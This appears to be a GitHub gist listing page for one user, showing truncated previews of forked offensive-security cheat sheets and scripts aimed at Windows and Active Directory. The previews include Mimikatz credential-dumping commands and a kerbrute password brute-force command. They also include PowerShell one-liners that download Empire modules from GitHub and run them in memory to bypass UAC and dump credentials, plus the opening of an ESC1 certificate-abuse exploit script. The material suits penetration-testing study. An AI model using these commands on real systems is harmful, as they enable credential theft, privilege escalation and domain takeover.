Web Application Hacker's Handbook Task checklist as a Github-Flavored Markdown file
sg1965
sg1965
/ WAHH_Task_Checklist.md
Created
July 25, 2022 01:40
— forked from amotmot/WAHH_Task_Checklist.md
The Web Application Hacker's Handbook - Task Checklist - Github-Flavored Markdown
sg1965
/ Mimikatz-cheatsheet
Created
October 14, 2022 08:11
— forked from insi2304/Mimikatz-cheatsheet
Mimikatz Cheat Sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #general | |
| privilege::debug | |
| log | |
| log customlogfilename.log | |
| #sekurlsa | |
| sekurlsa::logonpasswords | |
| sekurlsa::logonPasswords full |
sg1965
/ kerberos_attacks_cheatsheet.md
Created
October 19, 2022 11:25
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
sg1965
/ PowerView-3.0-tricks.ps1
Created
October 20, 2022 14:44
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
sg1965
/ OSCP_notes_brakertech.md
Created
October 22, 2022 05:35
— forked from dec0mrad3/OSCP_notes_brakertech.md
OSCP Notes #oscp
sg1965
/ OSCP_notes_brakertech.md
Created
October 22, 2022 05:36
— forked from ssstonebraker/OSCP_notes_brakertech.md
OSCP Notes #oscp
sg1965
/ OSCP_Redteam_Powershell_Cheatsheet.md
Created
October 22, 2022 05:38
— forked from ssstonebraker/OSCP_Redteam_Powershell_Cheatsheet.md
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
sg1965
/ Active Directory Attacks.md
Created
November 25, 2022 06:13
— forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
sg1965
/ namemash.py
Created
August 13, 2023 04:35
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| ''' | |
| NameMash by superkojiman | |
| Generate a list of possible usernames from a person's first and last name. | |
| https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/ | |
| ''' |
sg1965
/ esc1.ps1
Created
October 9, 2023 12:28
— forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
OlderNewer